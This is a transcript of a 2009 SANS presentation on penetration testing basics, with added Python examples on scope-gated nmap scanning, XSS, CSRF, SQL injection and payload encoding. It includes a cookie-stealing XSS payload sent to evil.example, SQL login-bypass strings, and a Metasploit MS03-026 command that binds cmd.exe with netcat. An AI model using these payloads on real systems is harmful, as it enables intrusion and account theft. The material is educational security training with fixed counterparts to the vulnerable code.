penetration testing basics
DESCRIPTION
A 45 minute presentation originally presented at the SANS COINS event in Regina, SK in March of 2009
TRANSCRIPT
Penetration Testing Basics Rick Wanner 2009
Penetration Testing Basics
A presentation of The Internet Storm Center,
The SANS Institute and The GIAC Certification Program
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 2
About Me: Rick Wanner B.Sc. I.S.P.
• Client Technology Manager, Security at SaskTel
• Areas of expertise
– Secure Network Architecture, Penetration Testing
– IDS, Policy Development and compliance
• Masters Student at STI (SANS Technology Institute)
• Handler at the Internet Storm Center (isc.sans.org)
• Independent contractor/Volunteer with SANS/GIAC
• [email protected]
Presentation Overview
• Internet Storm Centre
• SANS/GIAC Mini-Briefing
• Security Mitigation Strategies
– Penetration Testing
The Internet Storm Center
• The Internet Storm Center acts as a distributed early warning system for the Internet.
• The ISC acts as an intermediary with ISPs worldwide.
• The ISC is composed of approximately 40 volunteer handlers who coordinate a group of volunteer intrusion analysts and malware specialists.
• Daily blog/diary published at http://isc.sans.org/
• Sponsored by the SANS Institute.
We want your logs!
• The ISC's principal inputs are firewall and IDS logs contributed through DShield.org and by individual Internet users.
• All logs are scrubbed of identifying information before they are submitted.
SANS Training and GIAC Certifications
• SANS Institute is the leading training organization for system administration, audit, network, security and security management.
• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.
Today’s Cyber Threats
• Cyber threats have certainly changed since Al Gore invented the internet.
• What started off as ARPANET, a research network funded by the U.S. Department of Defense, is now a significant vehicle for conducting business, shopping, banking, researching, communicating, and maintaining vital corporate information.
• Unfortunately it is also a haven for hackers and malicious code.
The Internet
• The Internet is a community of individuals with its good neighbourhoods and bad neighbourhoods.
• In this community the bad neighbourhoods are only separated from the good neighbourhoods by at most 150 milliseconds.
The Need for Information Security
• While you are working hard to protect your organization’s critical information and systems, there are others out there who want to compromise it.
• Learning the appropriate actions to secure this information not only benefits your employer, clients, and stockholders, it benefits you.
• In this industry, you don’t want to be the one who learned the hard way.
Security Outlook
• As users get more sophisticated, so do the bad guys.
• A CA, Inc. report issued on January 29, 2007 stated that in 2006 trojans accounted for 62% of all malware, worms 24%, and viruses and other types of malware the remaining 13%.
• CA, Inc. predicts that attackers will use blended threats to steal private information and perpetrate other attacks:
– Phishers are getting smarter
– Spam will increase
– Targeted attacks will increase
– A rise in the use of kernel rootkits
– Increased exploitation of browser and application vulnerabilities
– Typo-squatting on search engines will increase
– Attacks are increasingly sophisticated.
Penetration Testing
• Penetration testing is finding, and demonstrating the exploitability of, vulnerabilities in your networks, systems, applications and data before the bad guys do.
• Penetration testing follows the same generalized methodology a real attacker uses, under agreed rules and with documented permission.
Generalized Attack Methodology
• Reconnaissance
• Scanning
• Gaining Access
• Maintaining Access
• Covering Tracks
Penetration Testing Method
• Preparation
• Reconnaissance
• Scanning
• Exploitation
• Analysis
• Reporting
Preparation
• Define the parameters of the test.
– Objectives
– Scope
– Roles and responsibilities
– Limitations
– Success factors
– Timeline
– Documented Permission
Reconnaissance
• Reconnaissance answers the question "What can a potential attacker learn about your company?"
• It utilizes publicly available information, so it involves little or no direct contact with the target's own systems.
Reconnaissance (2)
• Some sources of information:
– Search Engines
– Websites
– Registrars
– SEC
– Recruiting sites
– Netcraft.com
Reconnaissance (3) - Netcraft
Reconnaissance (4) - Netcraft
Scanning
• Now we know where to look, let's dig in a little deeper.
• Generally you are going to use two types of scanners: port scanners and vulnerability scanners.
• The hacker's choice:
– Nmap
– Nessus
Nmap
• Nmap - open-source port scanner
• Usually start with discovery scans (which hosts are up, which common ports are open) and progress to targeted scans (service versions, OS detection) of the interesting hosts.
• Runs on Windows and *nix.
• Available from nmap.org
Nmap Book
Nmap - Reconnaissance
• nmap -sL <address>
• nmap -sL www.telus.net/24
• nmap -sL 205.206.163.16/24
• -sL (list scan) only enumerates the targets and does reverse-DNS lookups; it sends no probes to the hosts themselves, which is why it fits the reconnaissance phase. Giving a hostname with /24 lists the whole class C around that host, so confirm the entire range is in scope before moving on to discovery.
Nmap - Discovery
• nmap -F <address> (-F, "fast", scans the 100 most common ports instead of the default 1000)
• nmap -F 192.168.1.0/24
• nmap --top-ports 20 <address> (scan only the 20 most common ports)
• nmap --top-ports 20 192.168.1.0/24
Nmap - Targeted
• nmap -F -A <address> (-A adds OS detection, version detection, script scanning and traceroute; noisy, so run it only against hosts you have chosen)
• nmap -F -A 192.168.1.200
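Bridging the Preparation, Discovery and Targeted slides, here is an added example (not code from the presentation or from the Nmap project): it parses Nmap's grepable output (-oG) from a discovery scan, drops any host that falls outside the documented scope, and builds the follow-on targeted command for the ports discovery actually found open. The sample scan output, the scope ranges and the function names are all constructed for the example.

```python
import ipaddress
import re
import shlex

# Constructed sample of nmap "grepable" output (-oG -) from a discovery scan such as
#   nmap -F -oG - 192.168.1.0/24
# This is made-up data for the example, not output from the presentation.
SAMPLE_GREPABLE = """\
# Nmap 4.76 scan initiated Mon Oct 27 21:50:01 2008 as: nmap -F -oG - 192.168.1.0/24
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (98)
Host: 192.168.1.200 ()\tStatus: Up
Host: 192.168.1.200 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-term-serv///\tIgnored State: closed (96)
Host: 192.168.1.250 ()\tStatus: Up
Host: 192.168.1.250 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (99)
# Nmap done at Mon Oct 27 21:51:12 2008 -- 256 IP addresses (3 hosts up) scanned in 71.23 seconds
"""

# Each entry in the "Ports:" field is port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)/")


def parse_grepable(text):
    """Return {host: [(port, proto, state, service), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the '# Nmap ...' comment lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        hosts.setdefault(host, [])
        for field in fields[1:]:
            if field.startswith("Ports:"):
                for port, state, proto, service in PORT_RE.findall(field):
                    hosts[host].append((int(port), proto, state, service))
    return hosts


def in_scope(host, authorized_networks):
    """Scope gate: a host may be scanned only if it lies inside a documented, authorized range."""
    addr = ipaddress.ip_address(host)
    return any(addr in ipaddress.ip_network(n) for n in authorized_networks)


def targeted_scan_commands(hosts, authorized_networks, states=("open",)):
    """Build the follow-on 'nmap -A' command per in-scope host, limited to the ports that
    discovery found in the wanted states. Out-of-scope hosts are dropped, not scanned.
    Returns argument lists ready for subprocess.run()."""
    commands = []
    for host, ports in sorted(hosts.items(), key=lambda kv: ipaddress.ip_address(kv[0])):
        if not in_scope(host, authorized_networks):
            continue
        wanted = sorted(p for p, _proto, state, _svc in ports if state in states)
        if not wanted:
            continue
        commands.append(["nmap", "-A", "-p", ",".join(str(p) for p in wanted), host])
    return commands


if __name__ == "__main__":
    # Hypothetical signed-off scope: the lower half of the /24 plus one named server.
    scope = ["192.168.1.0/25", "192.168.1.200/32"]
    for cmd in targeted_scan_commands(parse_grepable(SAMPLE_GREPABLE), scope):
        print(shlex.join(cmd))
```

With the sample data the script emits targeted scans for 192.168.1.1 (ports 80,443) and 192.168.1.200 (135,139,445); the filtered 3389 is left out and 192.168.1.250 is never touched because it is outside the authorized ranges.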
Vulnerability Scanner
• Nessus - vulnerability assessment (VA) scanner, free to download (it began as an open-source project; the code has been proprietary since version 3).
• The commercial plugin feed costs money; the free feed is limited to non-commercial use and lags behind.
Commercial Vulnerability Scanners
Rapid7 NeXpose
GFI LANguard
eEye Retina Network Security Scanner
Application Attacks
• Now we have all these layers of protection. Are you still vulnerable?
• The fact is that you can't deny what you must permit: traffic to the application's own port has to be allowed through the firewall.
• What about application level attacks?
Cross-Site Scripting
• Allows malicious web users to inject script into the web pages viewed by other users.
• Root cause: untrusted input is written back into a page without validation and without encoding for the HTML context it lands in.
• Permits the attacker to run arbitrary script in the victim's browser, in the origin of the vulnerable site, so it can read that site's cookies and act as the victim.
Yahoo's HotJobs site vulnerable to cross-site scripting attack
Dan Kaplan - October 27 2008
Internet research firm Netcraft's toolbar has detected a cross site scripting bug in Yahoo that could be exploited to steal authentication cookies.
The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious JavaScript code, Netcraft's Paul Mutton said in a blog post on Sunday.
"The script steals the authentication cookies that are sent for the Yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Mutton wrote.
The pilfered credentials could enable the attackers access to the victims' Yahoo accounts, including email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said.
"Simply visiting the malign URLs on Yahoo.com can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email — the victim does not even have to type in their username and password for the attacker to do this," Mutton wrote. "Both attacks send the victim to a blank webpage, leaving them unlikely to realize that their own account has just been compromised."
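To make the XSS slide and the HotJobs story concrete, here is an added example (not code from the presentation or from Yahoo): a search page that reflects its query parameter, first as written (the cookie-stealing payload becomes live script) and then with the value HTML-encoded for the context it is written into. The request strings, the evil.example host and the helper names are constructed for the example; the HttpOnly cookie flag at the end is the defence-in-depth measure that blunts this particular payload, not a substitute for encoding.

```python
import html
from urllib.parse import parse_qs

# Constructed requests (not from the article). The first is the kind of link a victim is
# tricked into clicking: the script ships document.cookie off to an attacker-run host.
ATTACK_QUERY = 'q=<script>new Image().src="http://evil.example/c?"%2Bdocument.cookie</script>'
HARMLESS_QUERY = "q=security+engineer"


def render_vulnerable(query_string):
    """Echoes the search term straight into the page. For ATTACK_QUERY the browser parses
    the injected <script> and runs it in the vulnerable site's origin."""
    term = parse_qs(query_string).get("q", [""])[0]
    return "<h1>Results for " + term + "</h1>"


def render_fixed(query_string):
    """Same page, but the untrusted value is encoded for HTML element content: <, >, &, and
    quotes become entities, so the browser displays the text and never parses it as markup."""
    term = parse_qs(query_string).get("q", [""])[0]
    return "<h1>Results for " + html.escape(term, quote=True) + "</h1>"


def contains_live_script(page):
    """Crude check used by the test: does the rendered page still contain a <script tag?"""
    return "<script" in page.lower()


def session_cookie_header(value):
    """Set-Cookie for the session. HttpOnly stops document.cookie from reading it, which is
    exactly what the harvesting payload above relies on; Secure keeps it off plain HTTP."""
    return "Set-Cookie: session=%s; Path=/; Secure; HttpOnly" % value
```

Note that HttpOnly only protects the cookie; script running in the site's origin can still issue requests as the victim, so the rendering fix is the real one.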
Cross-Site Request Forgery (XSRF)
• An attacker's page makes the victim's browser send requests that the website trusts, because the browser attaches the victim's session cookie to them automatically.
• Exploitation of an existing, authenticated web session.
• Embedded code (an image tag, a hidden auto-submitting form, a script) causes unauthorized actions in the victim's name.
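An added example (not code from the presentation) of the session-riding described on this slide, in a small in-memory stand-in for a web application: a transfer handler that authorizes on the session cookie alone accepts a forged request, while one that also demands a per-session token (the synchronizer token pattern) rejects it, because a page on another origin can make the browser send the cookie but cannot read the token. The session store, balances, request dictionaries and user names are constructed for the example.

```python
import hmac
import secrets

# In-memory stand-ins for a web application's session store and account data
# (constructed for the example).
SESSIONS = {}  # session cookie value -> {"user": ..., "csrf": ...}
BALANCES = {"alice": 100, "bob": 0, "mallory": 0}


def login(user):
    """Create a session and a random per-session CSRF token, as the site's own forms would embed."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(16)}
    return sid


def _do_transfer(user, form):
    amount = int(form["amount"])
    to = form["to"]
    if to not in BALANCES or BALANCES.get(user, 0) < amount:
        return 400
    BALANCES[user] -= amount
    BALANCES[to] += amount
    return 200


def transfer_vulnerable(request):
    """Authorizes on the cookie alone. The browser adds the cookie to any request for this
    site, including one an attacker's page triggered, so the forged request succeeds."""
    sess = SESSIONS.get(request["cookies"].get("session"))
    if sess is None:
        return 401
    return _do_transfer(sess["user"], request["form"])


def transfer_fixed(request):
    """Also requires the secret token only the site's own form could carry. The attacker's
    page cannot read it (same-origin policy), so a forged POST arrives without it."""
    sess = SESSIONS.get(request["cookies"].get("session"))
    if sess is None:
        return 401
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403
    return _do_transfer(sess["user"], request["form"])


def forged_request(session_cookie):
    """What a hidden form on an attacker's page makes the victim's browser send: the browser
    supplies the cookie, the attacker supplies the fields, nobody supplies the token."""
    return {"cookies": {"session": session_cookie},
            "form": {"to": "mallory", "amount": "100"}}


def legitimate_request(session_cookie):
    """The same action submitted from the site's own form, which embedded the session's token."""
    return {"cookies": {"session": session_cookie},
            "form": {"to": "bob", "amount": "10",
                     "csrf_token": SESSIONS[session_cookie]["csrf"]}}
```

The token comparison uses hmac.compare_digest so a wrong token cannot be guessed byte-by-byte from response timing; the token is tied to the session, so stealing one from another account does not help.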
SQL Injection
• SQL syntax is injected through user input that the application concatenates into a query; the test is whether the response changes (a database error, different results, a delay) because the input was interpreted as SQL rather than as data.
• Results
– Authentication bypass
– Unauthorized data access
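An added example (not code from the presentation) that runs the two checks this slide describes against a tiny SQLite database: the lone-quote probe, which produces a database error when the input reaches the SQL parser, and the classic authentication-bypass payloads, which log in as admin without the password. The vulnerable login concatenates strings; the fixed one uses a parameterised query. The table, the accounts and the function names are constructed for the example.

```python
import sqlite3


def build_db():
    """In-memory database with constructed sample accounts (not from the presentation)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "hunter2", "admin"), ("rick", "s3cret", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting, so a quote in the input changes the SQL."""
    query = ("SELECT role FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised query: the driver passes the values separately from the SQL text,
    so a quote in the input is just a quote inside the data."""
    query = "SELECT role FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# Two classic bypass payloads. The second works because SQLite, like most engines,
# treats "--" as a line comment and discards the password clause.
BYPASS_PAYLOADS = [("admin' OR '1'='1", "wrong"), ("admin'--", "wrong")]


def syntax_probe(conn, login):
    """First check from the slide: submit a lone quote and see whether the response changes.
    A database error means the input reached the SQL parser."""
    try:
        login(conn, "'", "x")
    except sqlite3.OperationalError:
        return True  # the quote broke the statement: injectable
    return False


def bypass_probe(conn, login):
    """Second check: which role, if any, does each payload log in as without a valid password."""
    return [login(conn, u, p) for u, p in BYPASS_PAYLOADS]
```

In a real engagement the error text (or its absence), not the role, is what you see, and blind variants rely on timing or boolean differences; the parameterised version returns nothing for every payload because the whole string is compared as a username.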
Preventing Web Application Attacks
• Every input should be validated, and every output encoded for the context it is written into!
• "Suspicion Breeds Confidence"
– Test it!
Nikto
• Open-source web server scanner written in Perl; runs on Linux or anywhere Perl runs. It checks for dangerous files and CGIs, outdated server software and risky configuration, rather than testing the application's own logic.
• Available at http://www.cirt.net/nikto2
Nikto (2)
• Basic scan
perl nikto.pl -h <host>
perl nikto.pl -h 192.168.1.1
• Multiple ports
perl nikto.pl -h 192.168.1.1 -p 80,88,443
Nikto – Simple Scan
[root@rwanner nikto]# ./nikto.pl -h localhost
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP:       127.0.0.1
+ Target Hostname: localhost
+ Target Port:     80
+ Start Time:      2008-10-27 21:53:47
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
+ OSVDB-3092: GET /manual/ : Web server manual found.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 9 item(s) reported on remote host
+ End Time:        2008-10-28 21:54:28 (41 seconds)
Nikto (3)
• Multiple hosts
perl nikto.pl -h <filename>
perl nikto.pl -h hosts.txt
• Hosts file (one target per line)
192.168.1.1:80:443
192.168.0.200
192.168.0.200,443
Nikto – Multiple Hosts Scan
]# ./nikto.pl -h hosts.txt
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP:       192.168.1.1
+ Target Hostname: 192.168.1.1
+ Target Port:     443
---------------------------------------------------------------------------
+ SSL Info: Ciphers: DES-CBC3-SHA
            Info:    /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/[email protected]
            Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/[email protected]
+ Start Time:      2008-10-28 21:16:37
---------------------------------------------------------------------------
+ Server: No banner retrieved
Commercial Web Scanners
IBM Rational AppScan
HP WebInspect
Cenzic Hailstorm
Exploitation
• Once you identify a potential vulnerability you have choices:
– Use individual exploits, available via the Internet (read the code before you run it: a public exploit is untrusted code, and it runs on your machine first)
– Use a pre-built exploitation framework.
• The most popular exploitation framework is Metasploit.
– Available for Windows or Linux
– Available at http://www.metasploit.com/
Metasploit
• 3 primary components
– Exploit
• Stack/Heap based buffer overflow
• Insecure coding
• PHP vulnerability, IIS Unicode, SQL injection, etc.
– NOP sled (optional - exploit dependent)
– Payload
• Shellcode
• Encoders
• Other (exploit dependent)
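An added example (not code from the presentation or from Metasploit) of what the "Encoders" entry under Payload is for: many exploits deliver the payload through code that stops at a NUL or a newline, so bytes like 0x00, 0x0a and 0x0d must not appear in what is sent. The example searches for a single-byte XOR key that maps every payload byte away from those "bad bytes", encodes with it, and reports when no such key exists (the case where a real encoder falls back to a multi-byte or additive scheme). The sample payload is a constructed stand-in, not shellcode, and the function names are assumptions; Metasploit's own encoders (for example the polymorphic shikata_ga_nai) are considerably more elaborate than this.

```python
# Constructed stand-in for a payload (not shellcode): it deliberately contains NUL, LF and CR,
# which strcpy-style copies and text-protocol parsers will not pass through intact.
SAMPLE_PAYLOAD = b"\x00\x00\x0a\x0dMOCK PAYLOAD BYTES\x00"
BAD_BYTES = {0x00, 0x0a, 0x0d}


def find_xor_key(payload, bad_bytes):
    """Return a single-byte XOR key that maps every payload byte outside bad_bytes.
    The key itself must also avoid bad_bytes, because the decoder stub carries it
    alongside the encoded data."""
    for key in range(1, 256):
        if key in bad_bytes:
            continue
        if all((b ^ key) not in bad_bytes for b in payload):
            return key
    raise ValueError("no single-byte XOR key avoids the bad bytes; "
                     "a multi-byte or additive encoder is needed")


def xor_encode(payload, key):
    return bytes(b ^ key for b in payload)


def xor_decode(encoded, key):
    return xor_encode(encoded, key)  # XOR is its own inverse: this is what the decoder stub does


def has_bad_bytes(data, bad_bytes):
    return any(b in bad_bytes for b in data)


def encode_payload(payload, bad_bytes):
    """Pick a key and encode; returns (key, encoded_bytes) for the exploit to prepend its stub to."""
    key = find_xor_key(payload, bad_bytes)
    return key, xor_encode(payload, key)


if __name__ == "__main__":
    key, encoded = encode_payload(SAMPLE_PAYLOAD, BAD_BYTES)
    print("key 0x%02x, clean: %s" % (key, not has_bad_bytes(encoded, BAD_BYTES)))
```

The decoder that runs on the target is the part left out here: it is architecture-specific machine code that walks the encoded bytes and XORs each with the key before jumping to the result, and it must itself be free of the bad bytes.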
Metasploit
# ./msfconsole                                start Metasploit
msf > use windows/dcerpc/ms03_026_dcom         select the exploit module (MS03-026, RPC DCOM)
msf > setg PAYLOAD windows/exec                payload: run a command on the target
msf > setg CMD nc -L -p 80 -e cmd.exe          bind cmd.exe to port 80 (assumes nc.exe is already on the target; -e is what hands cmd.exe to the listener)
msf > setg RHOST 192.168.0.2
msf > exploit
Exploitation Demo
• Patching and Configuration
– Lacking patch management procedures
– Single inbound port open through firewall
• Results
– Simple remote exploitation
– Worm characteristics
– Can be used to bypass firewalls
Commercial Tools
Core Impact
Analysis
• When you finish you will have a mountain of data to analyze.
• Break it down with a risk-based approach: rank findings by likelihood and impact to the business, not by raw tool output or the number of hits.
Reporting
• Base your report on risk.
• Write it so your senior executives can understand.
• Provide recommendations based on standards or best practices.
• Keep the Executive summary short.
• Stay away from FUD!
Presentation Summary
• Support the Internet Storm Center (ISC)
• SANS is the best!
• Test your servers and applications... before the bad guys do!
Special Tuition Offer
Because you attended this session, we are offering you 10% discount on tuition for our upcoming Critical infrastructure course in Calgary
COMMUNITY SANS
For details on this special offer, please contact [email protected] for further information.
Community SANS in Calgary
Critical Infrastructure Protection in CALGARY
Monday, June 15, 2009 – Wednesday, June 17, 2009
Please use:
Discount Code: COINS10 Discount : 10%
COMMUNITY SANS in REGINA
We are coming back to Regina again next month!!!
April 6-8, 2009
Regina Inn - Hotel & Conference Centre
Security 557 - "Virtualization Security and Operations"
One CPE Credit
You will receive one CPE credit for attending this evening.
THANK YOU!!!!
This evening was brought to you on behalf of our COMMUNITY OF INTEREST IN NETWORK SECURITY (COINS) program.
Thank you for joining us tonight!
SANS/GIAC Overview
SANS Training and GIAC Certifications
• SANS Institute is the leading training organization for system, audit, network, and security.
• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.
SANS and GIAC Guiding Principles
• Education
– Current, Evolving and Proven Material
– Certifications that prove you have the knowledge and skills to get the job done
• Hands-On
– Hands-on training conducted by instructors who are experts in their fields
– Testing process that evaluates hands-on capabilities
• Community
– Listening and learning to the community's needs
– Giving vital knowledge back to the community
How SANS and GIAC Are Different From Other Training/Certifications
• SANS and GIAC constantly update course and certification information to keep you on top of current threats and vulnerabilities.
• We use real-world, hands-on scenarios.
• While tools are an important part of IT security, we teach you and validate actual skills, so you don't have to rely solely on the performance of a tool.
• The SANS Promise - You will be able to apply our information security training the day you get back to the office.
GIAC Certification
GIAC Silver Certifications – Multiple choice exams only
GIAC Gold Certifications – Plus a written technical report
GIAC Platinum Series – Highest certification level
Top 3 Reasons to Earn Your GIAC Certification
1. Hiring managers use GIAC certifications to ensure that candidates actually possess deep technical skills
2. GIAC certifications help IT Security Professionals get promoted faster and earn more money
3. GIAC certification reinforces and affirms the 'hands on' knowledge you possess
What Certified People Say
"The GIAC certification has enabled me to take the next step in my Information Security career. It allowed me to prove that my value was more than just that of a security minded Sys Admin."–J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center
"The SANS hands-on experience and the intensive GIAC certification process has garnered me the respect of my boss and peers. Now, when I speak, people listen. I have the confidence to get the job done. My boss looks at me with respect that simply wasn't there before SANS training and GIAC certification. Not only my boss, but managers and peers at other large organizations." - Matt Carpenter, Enterprise Information Systems
GIAC certifications help IT Security Professionals get promoted faster and earn more money…
GIAC Certifications
• GSEC - Security Essentials
• GCFW - Firewall Analyst
• GCIA - Intrusion Analyst
• GCIH - Incident Handler
• GCFA - Forensics Analyst
• GCUX - Unix Security
• GCWN - Windows Security
• GNET - .NET
• GSOC - Securing Oracle
• GSSP-JAVA - Secure Coding
• GSSP-C - Secure Coding
• GISF - Information Security Fundamentals
• GSAE - Security Audit Essentials
• GSLC - Security Leadership
• GSNA - System & Network Auditor
• G7799 - ISO 17799/27001
• GISP - Information Security Professional
• GCIM - Incident Manager
• GAWN - Auditing Wireless Networks
• GREM - Reverse-Engineering Malware
• GPEN - Penetration Tester
• GCPM - IT Project Management
For a complete list of GIAC Certifications: http://www.giac.org/certifications/roadmap.php
Free Resources
• SANS and GIAC have a variety of free resources readily available at www.sans.org and www.giac.org
• Here's a sample of what we offer:
– Internet Storm Center
– SANS reading room - http://www.sans.org/reading_room
– Top 15 Malicious Spyware Actions
– SANS Security Policy Samples
– The Internet Guide to Popular Resources on Information Security
– FAQs
– SCORE
– Security Tool White Papers and GIAC Gold Papers
– Glossary of Security Terms
Questions: [email protected]@giac.org
Thank You!